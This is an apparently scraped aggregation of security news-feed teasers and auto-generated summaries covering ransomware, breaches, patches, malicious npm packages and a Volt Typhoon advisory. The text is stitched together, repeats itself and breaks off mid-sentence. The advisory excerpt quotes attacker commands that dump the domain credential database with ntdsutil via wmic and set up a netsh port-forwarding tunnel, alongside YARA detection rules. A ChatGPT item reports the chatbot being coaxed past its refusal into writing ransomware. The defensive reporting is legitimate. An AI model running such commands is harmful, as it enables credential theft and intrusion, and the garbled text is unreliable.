The post Tracking down a trojan: An inside look at threat hunting in a corporate network appeared first on Malwarebytes Labs.
"Autosummary:
(Source: BleepingComputer) Once someone in the email chain opens the attached PDF, they see a message saying, "This document contains protected files, to display them, click on the "open" button." QBot is notorious for its abilities to steal sensitive information, like login credentials, financial data, and personal information, and even create backdoors for additional malware to infiltrate the compromised system. However, the Malwarebytes MDR team promptly detected and contained this threat, taking steps such as cleaning the system of the infection, informing Company 1 of the incident, and providing actionable recommendations to prevent future compromises. "Categories: Business Join our upcoming Byte into Security webinar for a deep dive into K-12 cybersecurity. |
The post Webinar alert: How Coffee County Schools safeguards 7500 students and 1200 staff appeared first on Malwarebytes Labs.
"Autosummary:
Here"s what you can expect from this dialogue: An in-depth understanding of the hurdles faced by Coffee County Schools, in particular a stringent security audit. "Categories: News Categories: Ransomware Tags: CISA Tags: StopRansomware Tags: guide Tags: ZTA Tags: compromised Tags: cloud Tags: MDR CISA has updated its #StopRansomware guide to account for changes in ransomware tactics and techniques. |
The post CISA updates ransomware guidance appeared first on Malwarebytes Labs.
"Autosummary:
The #StopRansomware guide is set up as a one-stop resource to help organizations reduce the risk of ransomware incidents through best practices to detect, prevent, respond, and recover from them, including step-by-step approaches to address potential attacks.Look for anomalous usage of built-in Windows tools such as bcdedit.exe, fsutil.exe (deletejournal), vssadmin.exe, wbadmin.exe, and wmic.exe (shadowcopy or shadowstorage). that replace passwords with two or more verification factors (e.g., a fingerprint, facial recognition, device pin, or a cryptographic key).Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.Consider employing password-less MFA that replace passwords with two or more verification factors (e.g., a fingerprint, facial recognition, device pin, or a cryptographic key). "30% of adults have fallen victim or know someone who has fallen victim to an online scam while trying to save money when booking travel, according to McAfee. 34% of those who had money stolen have lost over $1,000 before their trip has even begun, while 66% lost up to $1,000. Too good to be true 62% of all vacationers will travel domestically this year and 42% will do so internationally. With inflation and the … More
The post Online scams target bargain-hunting holiday travelers appeared first on Help Net Security.
"Autosummary:
In today’s economic environment, adults are more likely to seek out a bargain deal online (56%), move quickly to snap up a deal (45%), try a new booking site (35%) and even a new destination (36%), in order to save money.While social media is by far the most common online activity for people to use their phones for while on vacation (60%), also common are chatting with friends and family (55%), online banking (35%) and sending money via apps such as PayPal or Venmo (22%). "Autosummary:
"Experts spotted the ALPHV/BlackCat ransomware group using signed malicious Windows kernel drivers to evade detection. Trend Micro researchers shared details about ALPHV/BlackCat ransomware incident that took place on February 2023. A BlackCat affiliate employed signed malicious Windows kernel drivers to evade detection. Experts believe the driver is a new version of the malware reported in December 2022 […]
The post BlackCat Ransomware affiliate uses signed kernel driver to evade detection appeared first on Security Affairs.
"Autosummary:
Nominate Pierluigi Paganini and Security Affairs here here: https://docs.google.com/forms/d/e/1FAIpQLSepvnj8b7QzMdLh7vWEDQDqohjBUsHyn3x3xRdYGCetwVy2DA/viewform Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Blackcat ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
In other words, it offers a stealthy way to infiltrate deeper into the targeted system, maintain persistence, and execute additional payloads or commands as part of the threat actor"s multi-stage attack. "Autosummary:
Rheinmetall is a German manufacturer of automotive, military vehicles, armaments, air defense systems, engines, and various steel products, which employs over 25,000 people and has an annual revenue of over $7 billion. "Autosummary:
"Autosummary:
It has a wide range of capabilities, including but not limited to tracking infected devices" location, stealing call logs, contacts, and text messages, sending SMS messages, taking pictures, and recording background audio. "Autosummary:
The stolen data, now publicly released on Cuba"s extortion portal, includes financial documents, correspondence with bank employees, account movements, balance sheets, tax documents, compensation, and source code. "Fusion Risk Management announced expanded functionality of its third-party risk management (TPRM) offering. The enhanced solution delivers continuous monitoring of third parties beyond its traditional instance as well as an evaluation of potential operational and business impacts that those third parties may have. This functionality enables a holistic and real-time view of third-party ecosystem health which improves decision-making and response times in order to transform how third-party risk teams anticipate and manage disruptions. Organizations continue … More
The post Fusion Risk Management TPRM enhancements deliver continuous monitoring of third parties appeared first on Help Net Security.
"Autosummary:
“Fusion continues to invest in product innovation to ensure that our customers have the most accurate understanding of third-party impacts across their enterprise, can accelerate real-time intelligence, can make the shift to a proactive risk management posture, and are able to thrive through any business disruption,” concluded Jackson. "Conceal has announced a new strategic partnership with White Rock Cybersecurity. “White Rock Cybersecurity is committed to delivering innovative, scalable, and manageable solutions in information technology,” said James Range, CEO of White Rock Cybersecurity. “With the inclusion of Conceal’s Zero Trust isolation technology in our offerings, we are significantly boosting the defense capabilities of our customers against both existing and emerging cyber threats at the edge,” Range added. ConcealBrowse, Conceal’s flagship product, is a browser … More
The post Conceal and White Rock Cybersecurity partner to isolate browsing sessions appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The targeting scope of the campaign is focused on Afghanistan, Azerbaijan, Iran, Iraq, Pakistan, and Turkey, infecting victims with tailored malware that steals data, propagates across systems via removable drives, and conducts surveillance. "Autosummary:
The malware then proceeds to harvest system metadata, running processes, installed applications, and files from different folders, all of which are transmitted back to the command-and-control (C2) server. "Google introduced Mobile VRP (vulnerability rewards program), a new bug bounty program for reporting vulnerabilities in its mobile applications. Google announced a new bug bounty program, named Mobile VRP (vulnerability rewards program), that covers its mobile applications. Google’s Mobile VRP is a bug bounty program for reporting vulnerabilities in first-party Android applications developed or maintained […]
The post Google announced its Mobile VRP (vulnerability rewards program) appeared first on Security Affairs.
"Autosummary:
Nominate Pierluigi Paganini and Security Affairs here here: https://docs.google.com/forms/d/e/1FAIpQLSepvnj8b7QzMdLh7vWEDQDqohjBUsHyn3x3xRdYGCetwVy2DA/viewform Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, bug bounty) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "The German automotive and arms manufacturer Rheinmetall announced it was victim of a Black Basta ransomware attack that took place last month. Rheinmetall is a German automotive and arms manufacturer that is listed on the Frankfurt stock exchange. The company this week announced it was victim of a ransomware attack conducted by the Black Basta ransomware group. The incident took place […]
The post German arms manufacturer Rheinmetall suffered Black Basta ransomware attack appeared first on Security Affairs.
"Autosummary:
Nominate Pierluigi Paganini and Security Affairs here here: https://docs.google.com/forms/d/e/1FAIpQLSepvnj8b7QzMdLh7vWEDQDqohjBUsHyn3x3xRdYGCetwVy2DA/viewform Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Balck Basta) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Delinea announced the latest version of Cloud Suite, part of its Server PAM solution, which provides privileged access to and authorization for servers. Delinea Cloud Suite updates include more granular support for just-in-time (JIT) and just-enough privilege access automation, and improved identity assurance through enforced human interaction when prompted for multi-factor authentication (MFA) at server log-in or privilege elevation. A 30-day study conducted by VMware revealed that almost 45% of intrusions also included a lateral … More
The post Delinea Cloud Suite updates reduce the risk of lateral movement in cybersecurity breaches appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Rich custom "Jackal" toolset According to Kaspersky, GoldenJackal employs a set of custom .NET malware tools that provide various functions, including credential dumping, data stealing, malware loading, lateral movement, file exfiltration, and more. Kaspersky has been tracking GoldenJackal since 2020, and today reports that the threat actors have had notable activity in Afghanistan, Azerbaijan, Iran, Iraq, Pakistan, and Turkey. "Categories: News Categories: Ransomware Tags: employee Tags: insider threat Tags: access control Tags: policy Tags: ransom An employee that tried to take advantage of a ransomware attack on his own company has pleaded guilty after 5 years of denying he had anything to do with it. |
The post Employee guilty of joining ransomware attack on his own company appeared first on Malwarebytes Labs.
"Autosummary:
The unauthorized access to the emails could be traced back to his home address, which gave the police sufficient grounds to seize a computer, laptop, phone, and a USB stick.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files. "Categories: Exploits and vulnerabilities Categories: News Tags: Apple Tags: RSR Tags: CVE-2023-32409 Tags: CVE-2023-28204 Tags: CVE-2023-32373 Tags: out of bounds Tags: use after free Apple issued information about patches against three actively exploited zero-days in WebKit. One vulnerability is new, two were patched earlier this month. |
The post Update now! Apple issues patches for three actively used zero-days appeared first on Malwarebytes Labs.
"Autosummary:
Apple has rolled out security updates for Safari 16.5, watchOS 9.5, tvOS 16.5, iOS 16.5, iPadOS 16.5, iOS 15.7.6, iPadOS 15.7.6, macOS Big Sur 11.7.7, macOS Ventura 13.4, and macOS Monterey 12.6.6. iPhone 6s and later models Mac workstations and laptops running macOS, Big Sur, Monterey, and Ventura Apple Watch (series 4 and later) Apple TV 4K and HD "The United States and international cybersecurity authorities are issuing this joint Cybersecurity Advisory (CSA) to highlight a recently discovered cluster of activity of interest associated with a People’s Republic of China (PRC) state-sponsored cyber actor, also known as Volt Typhoon. Private sector partners have identified that this activity affects networks across U.S. critical infrastructure sectors, and the authoring agencies believe the actor could apply the same techniques against these and other sectors worldwide.
This advisory from the United States National Security Agency (NSA), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Federal Bureau of Investigation (FBI), the Australian Signals Directorate’s Australian Cyber Security Centre (ACSC), the Communications Security Establishment’s Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NCSC-NZ), and the United Kingdom National Cyber Security Centre (NCSC-UK) (hereafter referred to as the “authoring agencies”) provides an overview of hunting guidance and associated best practices to detect this activity.
One of the actor’s primary tactics, techniques, and procedures (TTPs) is living off the land, which uses built-in network administration tools to perform their objectives. This TTP allows the actor to evade detection by blending in with normal Windows system and network activities, avoid endpoint detection and response (EDR) products that would alert on the introduction of third-party applications to the host, and limit the amount of activity that is captured in default logging configurations. Some of the built-in tools this actor uses are: wmic, ntdsutil, netsh, and PowerShell. The advisory provides examples of the actor’s commands along with detection signatures to aid network defenders in hunting for this activity. Many of the behavioral indi "
Autosummary:
watchdogd.exe In addition to the file names and paths above, malicious files names, believed to be randomly created, in the following format have also been discovered: C:\Windows\[a-zA-Z]{8}.exe f4dd44bc19c19056794d29151a5b1bb76afd502388622e24c863a8494af147dd ef09b8ff86c276e9b475a6ae6b54f08ed77e09e169f7fc0872eb1d427ee27d31 d6ebde42457fe4b2a927ce53fc36f465f0000da931cfab9b79a36083e914ceca 472ccfb865c81704562ea95870f60c08ef00bcd2ca1d7f09352398c05be5d05d 66a19f7d2547a8a85cee7a62d0b6114fd31afdee090bd43f36b89470238393d7 3c2fe308c0a563e06263bbacf793bbe9b2259d795fcc36b953793a7e499e7f71 41e5181b9553bbe33d91ee204fe1d2ca321ac123f9147bb475c0ed32f9488597 c7fee7a3ffaf0732f42d89c4399cbff219459ae04a81fc6eff7050d53bd69b99 3a9d8bb85fbcfe92bae79d5ab18e4bca9eaf36cea70086e8d1ab85336c83945f fe95a382b4f879830e2666473d662a24b34fccf34b6b3505ee1b62b32adafa15 ee8df354503a56c62719656fae71b3502acf9f87951c55ffd955feec90a11484 In some cases, the following user-agent string (including the extra spacing) was identified performing reconnaissance activities by this actor: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:68.0) Gecko/20100101 Firefox/68.0 rule ShellJSP { strings: $s1 = "decrypt(fpath)" $s2 = "decrypt(fcontext)" $s3 = "decrypt(commandEnc)" $s4 = "upload failed!"$s5 = "aes.encrypt(allStr)" $s6 = "newid" condition: filesize < 50KB and 4 of them } rule EncryptJSP { strings: $s1 = "AEScrypt" $s2 = "AES/CBC/PKCS5Padding" $s3 = "SecretKeySpec" $s4 = "FileOutputStream" $s5 = "getParameter" $s6 = "new ProcessBuilder" $s7 = "new BufferedReader" $s8 = "readLine()" condition: filesize < 50KB and 6 of them } rule CustomFRPClient { meta: description=”Identify instances of the actor"s custom FRP tool based on unique strings chosen by the actor and included in the tool” strings: $s1 = "%!PS-Adobe-" nocase ascii wide $s2 = "github.com/fatedier/frp/cmd/frpc" nocase ascii wide $s3 = "github.com/fatedier/frp/cmd/frpc/sub.startService" nocase ascii wide $s4 = "MAGA2024!!!" Windows Defender Firewall: Windows management instrumentation: Windows password spraying: Logging and playbook configuration: https://learn.microsoft.com/en-us/security/compass/incident-response-playbook-password-spray The NSA Cybersecurity Collaboration Center, along with the authoring agencies, acknowledge Amazon Web Services (AWS) Security, Broadcom, Cisco Talos, Google"s Threat Analysis Group, Lumen Technologies, Mandiant, Microsoft Threat Intelligence (MSTI), Palo Alto Networks, SecureWorks, SentinelOne, Trellix, and additional industry partners for their collaboration on this advisory.[T1090] to ports 8080, 8443, 8043, 8000, and 10443 with various filenames including, but not limited to: cisco_up.exe, cl64.exe, vm3dservice.exe, watchdogd.exe, Win.exe, WmiPreSV.exe, and WmiPrvSE.exe. In addition to the above TTPs used by the actor to copy the ntds.dit file, the following tools could be used by an actor to obtain the same information: Secretsdump.py Note: This script is a component of Impacket, which the actor has been known to use Invoke-NinjaCopy (PowerShell) DSInternals (PowerShell) FgDump Metasploit Best practices for securing ntds.dit include hardening Domain Controllers and monitoring event logs for ntdsutil.exe and similar process creations.The command uses a command prompt [T1059.003] to execute a Windows Management Instrumentation Command Line (WMIC) query, collecting information about the storage devices on the local host, including drive letter, file system (e.g., new technology file system [NTFS]), free space and drive size in bytes, and an optional volume name.ntdsutil \"ac i ntds\" ifm \"create full C:\Windows\Temp\Pro" wmic process call create "cmd.exe /c mkdir C:\Windows\Temp\tmp & ntdsutil \"ac i ntds\" ifm \"create full C:\Windows\Temp\tmp\" "cmd.exe" /c wmic process call create "cmd.exe /c mkdir C:\windows\Temp\McAfee_Logs & ntdsutil \"ac i ntds\" ifm \"create full C:\Windows\Temp\McAfee_Logs\" cmd.exe /QReference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise does not constitute or imply its endorsement, recommendation, or favoring by the authoring agencies" governments, and this guidance shall not be used for advertising or product endorsement purposes. CISA regional cyber threats: PRC state-sponsored activity: China Cyber Threat Overview and Advisories Microsoft Threat Intelligence blog: Volt Typhoon activity: https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/ Ntdsutil.exe: PowerShell: Windows command line process auditing:/c wmic process call create "cmd.exe /c mkdir C:\Windows\Temp\tmp & ntdsutil \"ac i ntds\" ifm \"create full C:\Windows\Temp\tmp\" 1> \\127.0.0.1\ADMIN$\<timestamp value> 2>&1 D:\{REDACTED}\xcopy C:\windows\temp\hp d:\{REDACTED} Get-EventLog security -instanceid 4624 ldifde.exe -f c:\windows\temp\cisco_up.txt -p subtree makecab ..\backup\210829-020000.zip ..\webapps\adssp\html\Lock.lic move "\\<redacted>\c$\users\public\Appfile\registry\SYSTEM" ..\backup\210829-020000.zip netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=9999 connectaddress={REDACTED} connectport=8443 protocol=tcp netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=9999 Rar.exe a –{REDACTED} c:\Windows\temp\DMBC2C61.tmp start-process -filepath c:\windows\temp\<filename>.bat -windowstyle hidden 1 Note:PS-Adobe-" nocase ascii wide $s2 = "github.com/fatedier/frp/cmd/frpc" nocase ascii wide $s3 = "github.com/fatedier/frp/cmd/frpc/sub.startService" nocase ascii wide $s4 = "HTTP_PROXYHost: %s" nocase ascii wide condition: 3 of them } Active Directory and domain controller hardening: wmic process call create "cmd.exe /c mkdir C:\users\public\Appfile & ntdsutil \"ac i ntds\" ifm \"create full C:\users\public\Appfile\" q q wmic process call create "cmd.exe /c mkdir C:\Windows\Temp\tmp & ntdsutil \"ac i ntds\" ifm \"create full C:\Windows\Temp\tmp\" wmic process call create "cmd.exe /cAustralian Cyber Security Centre (ACSC), the Communications Security Establishment’s Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NCSC-NZ), and the United Kingdom National Cyber Security Centre (NCSC-UK) (hereafter referred to as the “authoring agencies”) provides an overview of hunting guidance and associated best practices to detect this activity. "Managing compliance doesn’t have to be draining, time-consuming, or overly complicated. In this Help Net Security video, Wesley Van Zyl, Senior Manager, Compliance Success at Scytale, discusses how keeping track of all your security controls can be challenging, particularly when new cybersecurity threats emerge unexpectedly. To maintain consistent compliance and reliable monitoring, it is essential to incorporate automation technology into your compliance management system. By doing so, you can effectively mitigate the risk of human … More
The post How continuous security monitoring is changing the compliance game appeared first on Help Net Security.
"Autosummary:
"Before taking on the role as GM of IAI’s cyber division, Esti Peshin was a member of Israel’s parliament, wielding both legislation and regulation to strengthen the country’s renowned high-tech ecosystem. Despite her commitments, Esti shared with the Left to Our Own Devices podcast how she finds time to pilot aircraft as a source of inspiration. Where cyber security and aviation are headed Laying out the terrain of the aviation landscape “The commercial aviation ecosystem … More
The post What flying a plane can teach you about cybersecurity appeared first on Help Net Security.
"Autosummary:
Capacity buildup – Training, awareness, ensuring that the people involved, who are usually the weakest link, are aware of cyber best practices. Cyber attacks against airlines and airports are already becoming commonplace, causing disruption to the commercial aviation ecosystem and creating huge delays in flying, severe economic consequences, and negative media coverage.Now, some of us speak about AGI, artificial general intelligence, mimicking the activities or the behaviors of human beings, but AGI is not quite there in terms of technology. "Autosummary:
According to the U.K. Metropolitan Police, the criminals assumed false identities as representatives of various banks such as Barclays, Santander, HSBC, Lloyds, Halifax, First Direct, Natwest, Nationwide, and TSB. "Autosummary:
"Apart from the first password character, it is mostly able to recover the password in plaintext," security researcher "vdhoney," who discovered the flaw and devised a PoC, said. "Autosummary:
"A recently fixed command injection vulnerability (CVE-2023-28771) affecting a variety Zyxel firewalls may soon be exploited in the wild, Rapid7 researchers have warned, after publishing a technical analysis and a PoC script that triggers the vulnerability and achieves a reverse root shell. About CVE-2023-28771 CVE-2023-28771 affects: Zyxel APT, USG FLEX, and VPN firewalls running versions v4.60 to v5.35 of the ZDL firmware, and Zyxel ZyWALL/USG gateways/firewalls running ZLD v4.60 to v4.73 These firewall devices monitor … More
The post Vulnerability in Zyxel firewalls may soon be widely exploited (CVE-2023-28771) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Criminal IP, a prominent CTI search engine Criminal IP conducted a successful beta service for approximately one year before its official launch Source: AI SPERA Since its official launch on April 17, 2023, Criminal IP has achieved global recognition in cybersecurity, establishing itself as a prominent CTI search engine through API integrations and strong partnerships. "Autosummary:
"The group displays a preference for Graphical User Interface (GUI) tools, specifically S3 Browser (version 9.5.5) for their initial operations," the company said in a report shared with The Hacker News. "Satellite TV giant Dish Network disclosed a data breach after the February ransomware attack and started notifying impacted individuals. The American satellite broadcast provider Dish Network went offline on February 24, 2023, the outage impacted Dish.com, Dish Anywhere app, and many other services owned by the company. In early February, the company admitted that the outage was […]
The post Dish Network says the February ransomware attack impacted +300,000 individuals appeared first on Security Affairs.
"Autosummary:
Nominate Pierluigi Paganini and Security Affairs here here: https://docs.google.com/forms/d/e/1FAIpQLSepvnj8b7QzMdLh7vWEDQDqohjBUsHyn3x3xRdYGCetwVy2DA/viewform Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Dish) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
Malicious drivers used in BlackCat attacks (Trend Micro) Trend Micro"s analysts observed the exposed following commands that can be issued to the driver: Activate driver Deactivate the driver after the user mode client finishes its operation Kill any user-mode process Delete specific file paths Force-delete a file by freeing its handles and terminating running processes using it Copy files Force-copy files using a similar mechanism to force-delete Register Process/Thread Notification callbacks Unregister Process/Thread Notification callbacks Reboot the system by calling the "HalReturnToFirmware" API Copying files from the system (Trend Micro) Trend Micro comments that the two commands used for Process/Thread Notification callbacks are not working, indicating that the driver is currently under development or still in a testing phase. "Autosummary:
Most assets ($4.3M) were stolen from the Mainnet, $790k were snatched from Arbitrum, $410k from Polygon, and $390k from BNB, totaling $5.9 million. "US CISA added three zero-day vulnerabilities affecting iPhones, Macs, and iPads to its Known Exploited Vulnerabilities catalog. US Cybersecurity and Infrastructure Security Agency (CISA) added three zero-day vulnerabilities affecting iPhones, Macs, and iPads to its Known Exploited Vulnerabilities Catalog. The three issues reside in the WebKit browser engine and are tracked as CVE-2023-32409, CVE-2023-28204, and CVE-2023-32373. Below […]
The post CISA adds iPhone bugs to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.
"Autosummary:
Nominate Pierluigi Paganini and Security Affairs here here: https://docs.google.com/forms/d/e/1FAIpQLSepvnj8b7QzMdLh7vWEDQDqohjBUsHyn3x3xRdYGCetwVy2DA/viewform Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, CISA) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
The list of in-scope apps also contains what Google describes as "Tier 1" Android applications, which includes the following apps (and their package names): Google Play Services (com.google.android.gms) AGSA( com.google.android.googlequicksearchbox) Google Chrome (com.android.chrome) Google Cloud (com.google.android.apps.cloudconsole) Gmail (com.google.android.gm) Chrome Remote Desktop (com.google.chromeremotedesktop) Qualifying vulnerabilities include those allowing arbitrary code execution (ACE) and theft of sensitive data, and weaknesses that could be chained with other flaws to lead to a similar impact. "Categories: Business There are a lot of benefits to ChatGPT, but many in the security community have concerns about it. Malwarebytes" CEO Marcin Kleczynski takes a deep dive into the topic. |
The post ChatGPT: Cybersecurity friend or foe? appeared first on Malwarebytes Labs.
"Autosummary:
Unlike other chatbots, which are typically only able to produce canned replies on a few subjects, ChatGPT can mimic the style of celebrity CEOs, craft business pitches, compose music and song lyrics, answer test questions, simulate an entire chat room, write computer code, and much more.After further investigation, OpenAI discovered the vulnerability had exposed some user payment and personal data, including first and last names, email addresses, payment addresses, the last four digits of credit card numbers, and card expiration dates.According to the NIST AI Risk Management Framework published in January, an AI system can only be deemed trustworthy if it adheres to the following six criteria: Valid and reliable Safe Secure and resilient Accountable and transparent Explainable and interpretable Fair with harmful biases managed However, risks can emerge from socio-technical tensions and ambiguity related to how an AI program is used, its interactions with other systems, who operates it, and the context in which it is deployed. Both privacy and security concerns have prompted major banks, including Bank of America, JPMorgan Chase, Goldman Sachs, and Wells Fargo, to restrict or all-out ban ChatGPT and other generative AI models until they can be further vetted. Upon its launch in November 2022, tech enthusiasts quickly jumped at the shiny new disruptor, and for good reason: ChatGPT has the potential to democratize AI, personalize and simplify digital research, and assist in both creative problem-solving and tackling “busywork.” One of our researchers recently embarked on an experiment to get ChatGPT to write ransomware, and despite the chatbot’s initial protests that it couldn’t “engage in activities that violate ethical or legal standards, including those related to cybercrime or ransomware,” with a little coaxing, ChatGPT eventually complied. Because of its meteoric rise into public consciousness and rapid adoption, the generative AI chatbot has been the subject of continuing, complex conversations about its impact on the cybersecurity industry, threat landscape, and humanity as a whole. Assists engineers Malware analysts and reverse engineers could also benefit from ChatGPT’s assistance on traditionally challenging tasks, such as writing proof-of-concept code, comparing language- or platform-specific conventions, and analyzing malware samples.To bring disparate security efforts together, the AI community will need to adopt a similar modus operandi to traditional software, which benefits from an entire ecosystem of government, academia, and enterprise that has developed over more than 20 years.The AI tool’s phishing skills begin and end with writing emails because, again, it lacks the coding talent to produce other elements like credential harvesters, infected macros, or obfuscated code. "Autosummary:
"Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Apple fixes WebKit 0-days under attack (CVE-2023-28204, CVE-2023-32373, CVE-2023-32409) Apple has released security updates for iOS and iPadOS, macOS, tvOS and watchOS, delivering fixes for many vulnerabilities but, most importantly, for CVE-2023-32409, a WebKit 0-day that “may have been actively exploited.” Google Cloud CISO on why the Google Cybersecurity Certificate matters In this Help Net Security interview, Phil Venables, CISO … More
The post Week in review: KeePass vulnerability, Apple fixes exploited WebKit 0-days appeared first on Help Net Security.
"Autosummary:
Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Apple fixes WebKit 0-days under attack (CVE-2023-28204, CVE-2023-32373, CVE-2023-32409) Apple has released security updates for iOS and iPadOS, macOS, tvOS and watchOS, delivering fixes for many vulnerabilities but, most importantly, for CVE-2023-32409, a WebKit 0-day that “may have been actively exploited.” New infosec products of the week: May 19, 2023 Here’s a look at the most interesting products from the past week, featuring releases from Bitwarden, Cloudflare, ComplyAdvantage, Enzoic, Neurotechnology, Nozomi Networks, and Satori. "Autosummary:
"Autosummary:
"Autosummary:
"Like "Chuck from Montreal," "Jack" uses multiple aliases for the underground forums, social media, and Jabber accounts, and he too has gone to great lengths to disguise himself," eSentire researchers Joe Stewart and Keegan Keplinger said. "By using the badbullzvenom and badbullz accounts, and unbeknownst to forum members, he is essentially starting with a clean slate, and he can continue to build his credibility under the account aliases: badbullz and badbullzvenom," the researcher explained. "US CISA added the vulnerability CVE-2023-21492 flaw affecting Samsung devices to its Known Exploited Vulnerabilities Catalog. US CISA added the vulnerability CVE-2023-21492 vulnerability (CVSS score: 4.4) affecting Samsung devices to its Known Exploited Vulnerabilities Catalog. The issue affects Samsung mobile devices running Android 11, 12, and 13, it is described as an insertion of sensitive […]
The post US CISA warns of a Samsung vulnerability under active exploitation appeared first on Security Affairs.
"Autosummary:
Nominate Pierluigi Paganini and Security Affairs here here: https://docs.google.com/forms/d/e/1FAIpQLSepvnj8b7QzMdLh7vWEDQDqohjBUsHyn3x3xRdYGCetwVy2DA/viewform Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, CISA) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
These packages, downloaded a little over 1,200 times in total, are called: Package Versions Total Downloads nodejs-encrypt-agent 6.0.2, 6.0.3, 6.0.4, 6.0.5 521 nodejs-cookie-proxy-agent 1.1.0, 1.2.0, 1.2.1, 1.2.2, 1.2.3, 1.2.4 678 axios-proxy 1.7.3, 1.7.4, 1.7.7, 1.7.9, 1.8.9, 1.9.9 23 "First published more than two months ago, nodejs-encrypt-agent appears at first glance to be a legitimate package," state ReversingLabs researchers in their report. "Cybercriminal gang FIN7 returned with a new wave of attacks aimed at deploying the Clop ransomware on victims’ networks. Researchers at Microsoft Security Intelligence team published a series of tweets to warn of a new wave of attacks aimed at distributing the Clop ransomware and linked it to the financially motivated cybercriminal group Sangria Tempest […]
The post Cybercrime gang FIN7 returned and was spotted delivering Clop ransomware appeared first on Security Affairs.
"Autosummary:
Nominate Pierluigi Paganini and Security Affairs here here: https://docs.google.com/forms/d/e/1FAIpQLSepvnj8b7QzMdLh7vWEDQDqohjBUsHyn3x3xRdYGCetwVy2DA/viewform Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, FIN7) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Fake error message (Cyble) The malware will attempt to extract passwords and cookies from web browsers and specific filetypes (.txt, .lua, .pdf, .png, .jpg, .jpeg, .py, .cpp, and .db) from the user"s desktop folder. "Luxottica has finally confirmed the 2021 data breach that exposed the personal information of 70 million customers. Luxottica Group S.p.A. is an Italian eyewear conglomerate and the world’s largest company in the eyewear industry. As a vertically integrated company, Luxottica designs, manufactures, distributes and retails its eyewear brands, including LensCrafters, Sunglass Hut, Apex by Sunglass Hut, […]
The post 2021 data breach exposed data of 70 Million Luxottica customers appeared first on Security Affairs.
"Autosummary:
As a vertically integrated company, Luxottica designs, manufactures, distributes and retails its eyewear brands, including LensCrafters, Sunglass Hut, Apex by Sunglass Hut, Pearle Vision, Target Optical, Eyemed vision care plan, and Glasses.com. Nominate Pierluigi Paganini and Security Affairs here here: https://docs.google.com/forms/d/e/1FAIpQLSepvnj8b7QzMdLh7vWEDQDqohjBUsHyn3x3xRdYGCetwVy2DA/viewform Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, data breach) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Phishing scams pose an escalating danger as cybercriminals employ increasingly sophisticated techniques, rendering their detection and prevention more challenging. In this Help Net Security video, Abhilash Garimella, Head of Research at Bolster, talks about the evolution of phishing and scam websites in 2023.
The post Exploring the tactics of phishing and scam websites in 2023 appeared first on Help Net Security.
"Autosummary:
"Autosummary:
eSentire, in January, traced the identity of one of the key operators of the malware-as-a-service (MaaS) to an individual located in Montreal, Canada. "Autosummary:
The latest updates are available for the following devices - iOS 16.5 and iPadOS 16.5 - iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later - iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later iOS 15.7.6 and iPadOS 15.7.6 - iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation) - iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation) macOS "Autosummary:
The list of the rogue packages and their associated versions are listed below - nodejs-encrypt-agent (versions 6.0.2, 6.0.3, 6.0.4, and 6.0.5) nodejs-cookie-proxy-agent (versions 1.1.0, 1.2.0, 1.2.1, 1.2.2, 1.2.3, and 1.2.4), and axios-proxy (versions 1.7.3, 1.7.4, 1.7.7, 1.7.9, 1.8.9, and 1.9.9) "TurkoRat is just one of many open source malware families that are offered for "testing" purposes, but can readily be downloaded and modified for malicious use, as well," Lucija Valentić, threat researcher at ReversingLabs, said. "Autosummary:
"However, we have confirmed that certain employee-related records and personal information (along with information of some former employees, family members, and a limited number of other individuals) were among the data extracted. "Autosummary:
